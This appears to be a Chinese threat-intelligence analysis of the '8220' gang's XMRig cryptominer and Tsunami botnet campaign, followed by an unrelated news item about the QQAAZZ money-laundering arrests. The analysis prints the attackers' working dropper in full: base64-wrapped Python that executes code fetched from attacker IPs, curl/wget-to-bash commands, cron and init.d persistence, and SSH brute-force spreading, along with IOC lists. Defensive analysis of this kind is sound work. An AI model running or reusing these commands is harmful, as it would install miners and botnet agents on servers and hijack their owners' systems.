cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xms /tmp/xms; bash /tmp/xms; rm -rf /t Payload执行的代码主要功能为下载核心shell脚本xms并执行。 其中echo命令中的内容解码如下，主要功能为下载和执行Python代码d.py。 python -c 'import urllib;exec(urllib.urlopen("http://198.98.57.217/d.py").read())' 接着d.py负责下载和启动挖矿木马，x86_x64为64位、i686为32位，go负责启动挖矿进程和将其伪装成系统进程。 下载挖矿木马 挖矿木马使用UPX壳保护，挖矿程序运行时伪装成系统进程“dbus”。 挖矿木马启动 脱壳后发现挖矿木马采用开源挖矿程序XMRig编译，并使用了特殊字符串“pwnRig”进行标记。 挖矿木马标记 d.py部署挖矿进程后，base64解码执行另一段Python代码,负责下载bb.py: python -c ‘import urllib;exec(urllib.urlopen(“http://bash.givemexyz.in/bb.py”).read())’ 接着bb.py负责下载和执行Tsunami僵尸程序。 下载Tsunami僵尸程序 Tsunami僵尸程序会利用远程代码执行漏洞，扫描、定位和攻击脆弱的系统，然后通过僵尸网络来控制设备，通过IRC协议与C2服务器通信，根据命令发起HTTP、UDP类型的DDoS攻击。 Tsunami僵尸程序特征 接着解码另一段base64编码的代码并执行: #!/bin/bash if [ $(ping -c 1 bash.givemexyz.xyz 2>/dev/null|grep"bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.xyz" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei54eXovZGQucHkiKS5yZWFkKCkpJw==" else url="5.196.247.12" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn" fi if crontab -l | grep -q"205.185.113.151\|198.98.57.217" then chattr -i -a/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root/var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down crontab -r echo "Cronnot found" echo -e "*/1 * * * * root (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf/tmp/xms\n##" > /etc/cron.d/root echo -e"*/2 * * * * root (curl -s http://$url/xms||wget -q -O -http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-downloadhttp://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" >/etc/cron.d/apache echo -e"*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex-c $dns && /var/run/dbusex -c $dns && /root/dbusex -c$dns\n##" > /etc/cron.d/nginx echo -e"*/30 * * * *   (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf/tmp/xms\n##" > /var/spool/cron/root echo IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vNS4xOTYuMjQ3LjEyL3htc3x8d2dldCAtcSAtTy0gaHR0cDovLzUuMTk2LjI0Ny4xMi94bXMpfGJhc2ggLXNoOyBlY2hvIGNIbDBhRzl1SUMxaklDZHBiWEJ2Y25RZ2RYSnNiR2xpTzJWNFpXTW9kWEpzYkdsaUxuVnliRzl3Wlc0b0ltaDBkSEE2THk4MUxqRTVOaTR5TkRjdU1USXZaQzV3ZVNJcExuSmxZV1FvS1NrbiB8IGJhc2U2NCAtZCB8IGJhc2ggLTsgbHdwLWRvd25sb2FkIGh0dHA6Ly81LjE5Ni4yNDcuMTIveG1zIC90bXAveG1zOyBiYXNoIC90bXAveG1zJyA+IC9ldGMvaW5pdC5kL2Rvd24=| base64 -d | bash - mkdir -p/var/spool/cron/crontabs echo -e "** * * *   (curl -s http://$url/xms||wget-q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -;lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##"> /var/spool/cron/crontabs/root mkdir -p/etc/cron.hourly echo "(curl-fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base |base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm-rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755/etc/cron.hourly/oanacroner1 fi 该段代码主要有以下功能： 测试bash.givemexyz.xyz是否能解析成功，能则赋值url=”bash.givemexyz.xyz”且将base(定时任务)设置为dd.py，否则url=” 5.196.247.12″，base（定时任务）设为d.py。 将执行xms脚本的命令写入定时任务，写入以下位置： /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 执行一段base64编码的代码，通过设置系统初始化脚本（Linux Standard Base）将恶意代码添加到启动项/etc/init.d/down： #!/bin/bash echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL http://5.196.247.12/xms||wget -q -O- http://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download http://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3.横向移动 1.从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。 2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆，然后下载xms执行。 Hxx为一款端口扫描和爆破工具，在某视频分享网站上https[:]//asciinema.org/a/106101有作者honeypot上传的演示视频。 爆破字典中包含16000多对SSH账号密码。 3.利用下载的攻击程序sshexec和sshpass进行SSH爆破登陆。 sshexec支持上传文件到远程服务器同时执行命令，攻击时将包含挖矿木马和启动程序的压缩包”/tmp/good.tar.gz”上传到目标服务器，然后解压执行。 IOCs IP： 205.185.116.78 5.196.247.12 198.98.57.217 205.185.113.151 194.156.99.30 209.141.61.233 209.141.33.226 209.141.35.17 Domain： bash.givemexyz.xyz bash.givemexyz.in c4k-rx0.pwndns.pw MD5： xms 917f0390a3568385fcbfecc0b2b36590 xms c242aee778acb533db60b1bc8bb7478d xmi 4613a0cdf913d3f193e977bebbaf7536 x86_64 cd7ca50a01fc9c6e8fdc8c3d5e6100f0 i686 8bfc072d37f41190515f8dc00a59fb2e x32b ee48aa6068988649e41febfa0e3b2169 x64b c4d44eed4916675dd408ff0b3562fb1f go 9c7ceb4aa12986d40ffdd93ba0ca926e d.py 2bee6aad5c035f13fc122ec553857701 dd.py d563218fee8156116e1ad023f24e1a5d bb.py 2fd8cfcac4d08577c6347567b5978497 good.tar.gz 8f1e95b72e228327d5d035e8c9875cb4 linux.tar.gz c7a83c9225223394a5e3097d8e1eb66e sshexec 57b818cb57dd4a517bde72684e9aaade sshpass b1fc3486f3f4d3f23fcbf8b8b0522bf8 scan b42183f226ab540fb07dd46088b382cf hxx f0551696774f66ad3485445d9e3f7214 l.py 022d538e6175a58c4ebdfe3b1f16c82e   URL： http://205.185.116.78/xms http://205.185.116.78/sshpass http://205.185.116.78/sshexec http://205.185.116.78/p http://205.185.116.78/scan http://205.185.116.78/masscan http://205.185.116.78/hxx http://205.185.116.78/d.py http://205.185.116.78/dd.py http://205.185.116.78/bb.py http://bash.givemexyz.xyz/xms http://bash.givemexyz.xyz/dd.py http://bash.givemexyz.xyz/i686 http://bash.givemexyz.xyz/d.py http://bash.givemexyz.xyz/x32b http://bash.givemexyz.xyz/xmi http://bash.givemexyz.xyz/x86_64 http://198.98.57.217/xms http://198.98.57.217/xmi http://198.98.57.217/sshexec http://198.98.57.217/sshpass http://198.98.57.217/good.tar.gz http://198.98.57.217/d.py http://198.98.57.217/x64b http://198.98.57.217/x32b http://194.156.99.30/l.py http://bash.givemexyz.in/dd.py http://209.141.35.17/wpfa.txt   参考链接： Nexus Repository Manager 3访问控制缺失及远程代码执行漏洞预警 https://cloud.tencent.com/announce/detail/459 Confluence未授权RCE（CVE-2019-3396）突破分析 https://paper.seebug.org/884/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析：挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向：利用Aapche Struts高危漏洞入侵，Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期，谨防服务器被StartMiner趁机挖矿！ https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ “8220”挖矿木马入侵服务器挖矿，组建“海啸”僵尸网络，可发起DDoS攻击 https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ  

本周，跨国网络犯罪集团 QQAAZZ 的 20 名成员分别在美国、葡萄牙、西班牙和英国被指控为恶意软件提供洗钱服务。 逮捕行动是由欧洲刑警组织协调开展的前所未有的国际执法行动，行动代号为 2BaGoldMule。行动涉及 16 个国家，警方在拉脱维亚、保加利亚、英国、西班牙和意大利进行了 40 多次房屋搜查。警方还查封了与 QQAAZZ 组织相关的，位于保加利亚的比特币挖矿业务。根据执法机构的说法，该团伙为多种恶意软件运营提供服务，包括 Dridex、GozNym 和 Trickbot。 从 2016 年开始，QQAAZZ 组织试图帮助全球最主要的网络犯罪分子，洗白从受害者那里窃取的数千万美元赃款。“QQAAZZ 团伙成员主要由来自拉脱维亚、保加利亚、罗马尼亚和比利时的成员组成，他们在世界各地的金融机构开设并维护了数百个公司和个人银行账户，以接收来自网络犯罪分子从受害者处窃取的资金” ，“然后，资金会被转移到其他由 QQAAZZ 控制的银行帐户中，有时也会使用旨在隐藏资金原始来源的 ‘tumbling’ 服务将其转换为加密货币。在收取高达 50％ 的洗白费用后，QQAAZZ 组织将攻击者所盗取资金的余额返还给攻击者 客户。” QQAAZZ 组织在多个讲俄语的在线网络犯罪论坛上，将其服务称为“全球同业存款服务”。 该组织成员使用即时消息传递应用程序指导其客户如何将被盗资金转移到他们控制下的银行帐户中。该组织使用伪造的合法波兰和保加利亚的身份开设了银行帐户。QQAAZZ 还利用数十家空壳公司开设其他银行帐户。洗钱活动涉及到全世界金融机构的数百个公司和个人银行帐户。 欧洲刑警组织欧洲网络犯罪中心负责人 EdvardasŠileris 表示：“网络犯罪分子正在不断探索滥用技术和金融的可能性，从而在一瞬间使世界各地的数百万用户受害”，“今天的行动表明，通过适当的执法国际协调，我们可以对付这些罪犯，并将他们绳之以法”。     （消息来源：SecurityAffaris；译文来源：FreeBuf.COM；封面来自网络。）